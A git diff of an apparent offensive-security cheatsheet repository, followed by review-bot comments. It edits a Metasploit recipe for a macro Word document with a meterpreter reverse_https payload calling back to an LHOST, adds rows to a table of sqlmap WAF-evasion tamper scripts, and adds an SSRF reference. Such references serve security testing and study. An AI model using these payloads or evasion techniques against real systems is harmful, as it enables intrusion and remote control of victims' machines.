diff --git a/Methodology and Resources/Metasploit - Cheatsheet.md b/Methodology and Resources/Metasploit - Cheatsheet.md index 53132677..6438f7a0 100644 --- a/Methodology and Resources/Metasploit - Cheatsheet.md +++ b/Methodology and Resources/Metasploit - Cheatsheet.md @@ -135,7 +135,7 @@ exploit -j -z use exploit/multi/fileformat/office_word_macro set PAYLOAD windows/meterpreter/reverse_https -set LHOST 159.65.52.124 +set LHOST 10.10.14.22 set LPORT 4646 exploit ``` diff --git a/SQL injection/README.md b/SQL injection/README.md index 136d7c2d..89567870 100644 --- a/SQL injection/README.md +++ b/SQL injection/README.md @@ -183,6 +183,7 @@ tamper=name_of_the_tamper | Tamper | Description | | --- | --- | +|0x2char.py | Replaces each (MySQL) 0x encoded string with equivalent CONCAT(CHAR(),…) counterpart | |apostrophemask.py | Replaces apostrophe character with its UTF-8 full width counterpart | |apostrophenullencode.py | Replaces apostrophe character with its illegal double unicode counterpart| |appendnullbyte.py | Appends encoded NULL byte character at the end of payload | 
@@ -190,8 +191,12 @@ tamper=name_of_the_tamper |between.py | Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' | |bluecoat.py | Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator | |chardoubleencode.py | Double url-encodes all characters in a given payload (not processing already encoded) | +|charencode.py | URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54) | +|charunicodeencode.py | Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054) | +|charunicodeescape.py | Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054) | |commalesslimit.py | Replaces instances like 'LIMIT M, N' with 'LIMIT N OFFSET M'| |commalessmid.py | Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)'| +|commentbeforeparentheses.py | Prepends (inline) comment before parentheses (e.g. ( -> /**/() | |concat2concatws.py | Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)'| |charencode.py | Url-encodes all characters in a given payload (not processing already encoded) | |charunicodeencode.py | Unicode-url-encodes non-encoded characters in a given payload (not processing already encoded) | 
@@ -199,16 +204,24 @@ tamper=name_of_the_tamper |escapequotes.py | Slash escape quotes (' and ") | |greatest.py | Replaces greater than operator ('>') with 'GREATEST' counterpart | |halfversionedmorekeywords.py | Adds versioned MySQL comment before each keyword | +|htmlencode.py | HTML encode (using code points) all non-alphanumeric characters (e.g. ‘ -> ') | +|ifnull2casewhenisnull.py | Replaces instances like ‘IFNULL(A, B)’ with ‘CASE WHEN ISNULL(A) THEN (B) ELSE (A) END’ counterpart| |ifnull2ifisnull.py | Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)'| +|informationschemacomment.py | Add an inline comment (/**/) to the end of all occurrences of (MySQL) “information_schema” identifier | +|least.py | Replaces greater than operator (‘>’) with ‘LEAST’ counterpart | +|lowercase.py | Replaces each keyword character with lower case value (e.g. SELECT -> select) | |modsecurityversioned.py | Embraces complete query with versioned comment | |modsecurityzeroversioned.py | Embraces complete query with zero-versioned comment | |multiplespaces.py | Adds multiple spaces around SQL keywords | |nonrecursivereplacement.py | Replaces predefined SQL keywords with representations suitable for replacement (e.g. .replace("SELECT", "")) filters| -|percentage.py | Adds a percentage sign ('%') infront of each character | |overlongutf8.py | Converts all characters in a given payload (not processing already encoded) | +|overlongutf8more.py | Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. 
SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94) | +|percentage.py | Adds a percentage sign ('%') infront of each character | +|plus2concat.py | Replaces plus operator (‘+’) with (MsSQL) function CONCAT() counterpart | +|plus2fnconcat.py | Replaces plus operator (‘+’) with (MsSQL) ODBC function {fn CONCAT()} counterpart | |randomcase.py | Replaces each keyword character with random case value | |randomcomments.py | Add random comments to SQL keywords| -|securesphere.py | Appends special crafted string| +|securesphere.py | Appends special crafted string | |sp_password.py | Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs | |space2comment.py | Replaces space character (' ') with comments | |space2dash.py | Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n') | diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index e2699f11..d79c0618 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md 
@@ -509,4 +509,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [Piercing the Veil: Server Side Request Forgery to NIPRNet access](https://medium.com/bugbountywriteup/piercing-the-veil-server-side-request-forgery-to-niprnet-access-c358fd5e249a) - [Hacker101 SSRF](https://www.youtube.com/watch?v=66ni2BTIjS8) - [SSRF脆弱性を利用したGCE/GKEインスタンスへの攻撃例](https://blog.ssrf.in/post/example-of-attack-on-gce-and-gke-instance-using-ssrf-vulnerability/) -- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) \ No newline at end of file +- [SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1 - SaN ThosH - 10 Jan 2019](https://medium.com/@madrobot/ssrf-server-side-request-forgery-types-and-ways-to-exploit-it-part-1-29d034c27978) +- [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) \ No newline at end of file
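Review bot: in the Metasploit - Cheatsheet.md hunk, replacing `set LHOST 159.65.52.124` with `set LHOST 10.10.14.22` is the right call, since the old value is a publicly routable address and anyone pasting the office_word_macro example would have pointed a reverse_https handler at a live host; to make that impossible in future copy-paste, consider an obvious placeholder (`set LHOST <attacker_ip>`) or an RFC 5737 documentation address instead of a specific private IP, and grep the rest of the cheatsheet for other `LHOST`/`RHOST` lines that still carry the public address.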
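Review bot: in the first SQL injection/README.md hunk (`@@ -183,6 +183,7 @@`), the new `0x2char.py` row uses a Unicode ellipsis in `CONCAT(CHAR(),…)` while every other row in the table sticks to plain ASCII; write it as `CONCAT(CHAR(),...)` or as `CONCAT(CHAR(), CHAR(), ...)` so the table stays consistent and greppable. The alphabetical placement before `apostrophemask.py` is correct.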
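Review bot: the second SQL injection hunk (`@@ -190,8 +191,12 @@`) introduces duplicate rows: `charencode.py` and `charunicodeencode.py` are added near the top of the block, but the unchanged context a few lines further down still carries `|charencode.py | Url-encodes all characters in a given payload ...|` and `|charunicodeencode.py | Unicode-url-encodes non-encoded characters ...|`. Drop the two old rows in this same change so the table lists each tamper once, keeping the new versions since they carry the worked `SELECT -> ...` examples. Also, the example in the `commentbeforeparentheses.py` row, `(e.g. ( -> /**/()`, reads as unbalanced parentheses; quoting the operands the way neighbouring rows do (`(e.g. '(' -> '/**/(')`) makes it unambiguous.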
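Review bot: in the third SQL injection hunk (`@@ -199,16 +204,24 @@`) the `htmlencode.py` example `(e.g. ‘ -> ')` shows an apostrophe turning into an apostrophe, so it demonstrates no encoding at all; the intended output is the numeric entity for `'`, i.e. `&#39;`, and because Markdown will render that entity back into a quote inside a table cell it needs to be escaped (`&amp;#39;`) or put in backticks to survive rendering. The same hunk mixes typographic quotes (`‘IFNULL(A, B)’`, `“information_schema”`, `(‘>’)`, `(‘+’)` in the `ifnull2casewhenisnull.py`, `informationschemacomment.py`, `least.py`, `plus2concat.py` and `plus2fnconcat.py` rows) with the straight `'` used everywhere else in the table; normalise them to straight quotes, since a reader copying a tamper example into a shell will otherwise get the wrong bytes. Two smaller points while this block is being touched: the re-added `percentage.py` row keeps the `infront` typo (`in front`), and the unchanged `overlongutf8.py` row directly above the new `overlongutf8more.py` entry is missing the words `to overlong UTF8`, which the new row has, so the two descriptions should be aligned.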
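Review bot: the Server Side Request Forgery/README.md hunk still ends with `\ No newline at end of file` on the added line, so the next contributor who appends a reference will produce the same noisy one-line-removed/one-line-added diff that this hunk shows for the Part-1 entry; add a trailing newline now. For consistency with the entry just above it (`Title - Author - Date`), the new reference could also carry the date that is visible in its own URL path (`/2019/02/06/`), e.g. `... : LDAP - @0xrst - 06 Feb 2019`.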